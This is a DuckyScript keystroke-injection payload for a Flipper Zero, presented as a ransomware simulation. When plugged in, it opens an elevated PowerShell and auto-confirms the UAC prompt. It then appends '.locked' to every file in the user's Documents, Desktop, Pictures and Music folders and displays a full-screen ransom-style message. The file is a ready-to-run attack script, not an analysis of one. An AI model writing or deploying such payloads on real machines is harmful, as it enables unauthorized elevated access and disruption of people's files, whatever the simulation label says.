REM #########################################################################################################################
REM ################                    This script was created by github.com/MarkCyber                          ############
REM ################        This script is intended to act as a simulation of a ransomware attack                ############
REM ################   This script will change all file extensions to .locked rather than encrypting the files   ############
REM #########################################################################################################################


REM Set delay for flipper
DELAY 500
GUI r
DELAY 100
STRING powershell -Command "Start-Process powershell -Verb runAs"
ENTER
DELAY 500
ALT y
DELAY 500

REM Rename files in specified locations to append .locked to every file
STRING $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File; foreach ($file in $files) { $null = $file | Rename-Item -NewName {$file.Name + '.locked'}; if (-not $?){ $errorOccurred = $true } } }
STRING IF ($errorOccurred) { exit }
ENTER
DELAY 1000

REM Display ransomware message
STRING Add-Type -AssemblyName PresentationFramework; $Window = New-Object System.Windows.Window; $Window.WindowStartupLocation = 'CenterScreen'; $Window.WindowState = 'Maximized'; $Window.Topmost = $true; $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'; $Window.ShowDialog()
ENTER
DELAY 1000

STRING exit
ENTER